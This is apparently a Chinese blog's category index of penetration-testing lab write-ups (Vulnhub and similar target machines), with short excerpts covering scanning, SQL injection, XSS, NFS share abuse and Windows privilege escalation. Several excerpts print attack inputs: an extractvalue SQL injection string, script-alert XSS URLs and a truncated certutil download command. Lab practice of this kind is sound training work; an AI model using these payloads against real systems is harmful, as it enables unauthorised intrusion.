随笔分类 -  靶机测试

摘要:总结: 此台机器为域渗透类型,内容十分精彩 平时很难碰到这么好的环境 真的是学到了很多干货 。 强烈推荐做完 。 步骤: samba获取文件 > 获取用户列表 > 枚举用户得到TGT > hashcat解密TGT > rpcclient枚举权限 > SeBackupPrivilege和SeResto 阅读全文
posted @ 2020-09-01 08:58 总得前行 阅读(793) 评论(0) 推荐(0) 编辑
摘要:nmap dirsearch 看到CMS框架 bing一下 https://www.exploit-db.com/exploits/48506 down下来执行就拿到shell了。。 但是在这个shell下执行certutil.exe -urlcache -split -f http://10.10 阅读全文
posted @ 2020-08-27 14:51 总得前行 阅读(752) 评论(0) 推荐(0) 编辑
摘要:Nmap 看到1 ftp允许匿名访问,2 80开放,3 111,135,139,445,2049开放, 先看下ftp,空目录 且无写入权限 Enum4linux枚举为空, smbclient也是报错, showmount出来了 挂载,站点文件出来了,这个看目录名称应该是备份目录否则直接试试上传后门了 阅读全文
posted @ 2020-08-26 22:30 总得前行 阅读(468) 评论(0) 推荐(0) 编辑
摘要:###总结: 此lab设计了很多场景,但是个人测试时未按照其规划思路来只是验证出有漏洞即可,做完后个人的感悟就是 非常累,很多题目都是简单的替换单引号,双引号,双引号加括号这类,纯粹体力活。 其中个人认为有价值做的题目是24,26,27,32,34,仅此而已。 注意一点是post型宽字节注入需要在b 阅读全文
posted @ 2020-08-25 11:17 总得前行 阅读(260) 评论(0) 推荐(0) 编辑
摘要:vuhub Tr0ll官方下载地址 首先netdiscover nmap 发现ftp可匿名登录 robots.txt有目录 首先ftp进去看有什么东西 发现是一个pcap包,下载下来看看里面有啥敏感流量 分析流量包前先看下网页, 首页一张图 输入/secret目录还是一张图,看了下请求包也没啥发现 阅读全文
posted @ 2020-08-23 11:51 总得前行 阅读(260) 评论(0) 推荐(0) 编辑
摘要:Vulhub-Lord_Of_The_Root1.0.1靶机官方地址 Netdiscover Nmap 发现只开了22端口,openssh版本6.6.1p1, 记得openssh有个枚举用户名的漏洞,尝试枚举和爆破密码, 枚举报错了,但是发现了线索。 红框中翻译:魔戒 敲击进入 没猜错的话这个是考察 阅读全文
posted @ 2020-08-14 17:59 总得前行 阅读(730) 评论(0) 推荐(0) 编辑
摘要:Vulnhub-Wintermute-Neuromancer靶机地址 首先文件目录中readme说了需要单独设置网段,只能通过另一台靶机访问,如果我们可以直接访问那算作弊。。 注意这儿目标靶机一定是网卡2,不要改动,不然会访问不到 那么接上一台靶机的meterpreter Wintermute-St 阅读全文
posted @ 2020-08-12 18:01 总得前行 阅读(428) 评论(0) 推荐(0) 编辑
摘要:Vulnhub-Wintermute-Neuromancer Netdiscover Nmap 访问80 Dirsearch和dirb未发现有价值目录 尝试访问3000端口 尝试admin admin。 。登进来了 看看其是否有漏洞可直接利用, 没发现有漏洞,查看页面是否有信息 找到路径,尝试访问, 阅读全文
posted @ 2020-08-12 09:26 总得前行 阅读(342) 评论(0) 推荐(0) 编辑
摘要:Vulnhub-Kioptrix_level_1靶机地址 这台机器安装时可能有问题,解决方法点这儿 netdiscover和nmap Dirsearch 看了下就是redhat的默认apache页面,未发现有价值的信息。 看到mod_ssl和openssl版本,searchsploitch 有漏洞, 阅读全文
posted @ 2020-08-11 09:23 总得前行 阅读(1003) 评论(0) 推荐(0) 编辑
摘要:Vulnhub-pwnlab-init靶机地址 Netdiscover 找到靶机地址,nmap扫描 dirserach扫描先 访问链接,注意到有=号,page=login可能对应着包含login.php文件 尝试包含其他文件,注意这儿文件没有跟.php 说明代码中有处理,所以一般我们包含其他文件如/ 阅读全文
posted @ 2020-08-10 14:43 总得前行 阅读(1025) 评论(0) 推荐(0) 编辑
摘要:Vulnhub-zico2靶机地址 找到ip并扫描 Dirsearch 扫下目录 访问http://192.168.2.101/dbadmin/ 好吧。。做过的题。。这个phpLiteAdmin 存在一个代码执行漏洞, 这个存在弱口令,输入admin 进入。 启动python的http服务,准备好文 阅读全文
posted @ 2020-08-08 13:34 总得前行 阅读(240) 评论(0) 推荐(0) 编辑
摘要:1 http://10.10.10.100/login.php 存在sql注入 Username: admin@isints.com' and extractvalue(1,concat(0x5c,(select database())))# Password: x 存在注入,那么sqlmap 跑一 阅读全文
posted @ 2020-08-07 20:51 总得前行 阅读(528) 评论(0) 推荐(0) 编辑
摘要:vulnhub-靶机地址 netdiscover 找到靶机地址及nmap扫描 尝试dirsearch 和 dirb 爆破8080端口目录 无果和报错,尝试31337端口 可访问 那么继续dirsearch ,发现仍不行 。 尝试找squid/3.5.23漏洞,存在一溢出漏洞但是相关信息少且没有利用代 阅读全文
posted @ 2020-08-07 17:43 总得前行 阅读(356) 评论(0) 推荐(0) 编辑
摘要:-使用vulstudy一键搭建靶机 1 http://192.168.0.200:8091/level1.php?name=test%3Cscript%3Ealert(/x/)%3C/script%3E 2 http://192.168.0.200:8091/level2.php?keyword=t 阅读全文
posted @ 2020-08-07 09:27 总得前行 阅读(698) 评论(0) 推荐(0) 编辑
摘要:靶机下载地址 nmap扫描先 只有两端口开放,访问666端口, 尝试dirsearch 和 dirb 发现都报错没有结果,尝试刷新浏览器时发现网页会报错, 确定这个不是机器故障,应该是作者故意做的,那么继续寻找线索,最终发现cookie处存在线索 没有发现明显线索,但是仔细看发现Expires=": 阅读全文
posted @ 2020-08-06 16:29 总得前行 阅读(304) 评论(0) 推荐(0) 编辑
摘要:1 寻找靶机地址 netdiscover -i enp0s3 2 nmap 扫描 3 可以看到111端口存在nfs,使用rpcinfo或者showmount查看, 4 可看到存在/home/peter共享目录,一般来说把home用户目录挂载出来的我们可以立即尝试挂载并添加authorized_key 阅读全文
posted @ 2020-08-05 15:50 总得前行 阅读(320) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示